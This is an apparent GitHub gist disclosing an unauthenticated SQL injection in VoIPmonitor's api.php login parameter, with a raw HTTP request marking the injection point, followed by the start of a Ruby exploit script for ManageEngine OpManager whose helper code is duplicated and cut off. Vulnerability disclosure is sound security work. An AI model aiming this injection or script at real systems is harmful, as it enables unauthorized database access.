Murat Y. divinepwner

## voipmonitor.md

      
              1 file
            
          
              0 forks
            
          
              1 comment
            
          
              4 stars
            
          
                divinepwner
                / voipmonitor.md
            
            
              Created
              April 28, 2021 19:33
            
              
                voipmonitor unauth sql injection
              
          
    sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.
GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

  
## opManager-Clickbait-Exploit.rb
require 'optparse'
require 'net/http'
require 'mime/types'
require 'uri'

def make_request (uri, header = {}, post_body = "")
	http = Net::HTTP.new(uri.host, uri.port)
	request = Net::HTTP::Post.new(uri.request_uri, header)
	request.body = post_body
	response = http.request(request)
	require 'optparse'
	require 'net/http'
	require 'mime/types'
	require 'uri'

	def make_request (uri, header = {}, post_body = "")
	http = Net::HTTP.new(uri.host, uri.port)
	request = Net::HTTP::Post.new(uri.request_uri, header)
	request.body = post_body
	response = http.request(request)